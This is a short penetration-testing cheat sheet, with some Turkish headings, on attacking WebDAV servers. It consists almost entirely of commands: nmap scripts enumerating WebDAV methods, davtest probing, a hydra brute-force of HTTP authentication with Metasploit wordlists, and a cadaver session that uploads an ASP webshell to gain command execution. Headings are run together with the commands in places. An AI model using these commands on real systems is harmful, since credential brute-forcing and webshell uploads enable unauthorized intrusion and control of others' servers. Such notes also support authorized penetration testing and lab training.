WEBDAV
nmap --script http-methods --script-args http-methods.url-path=/webdav/ <IP> nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/ <IP>davtest -url http://example.com/webdavBrute Force
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <IP> http-get /webdav/davtest -auth admin:password123 -url http://example.com/webdavKomut Çalıştırma
cadaver http://example.com/webdav
put /usr/share/webshells/asp/webshell.asp
Last updated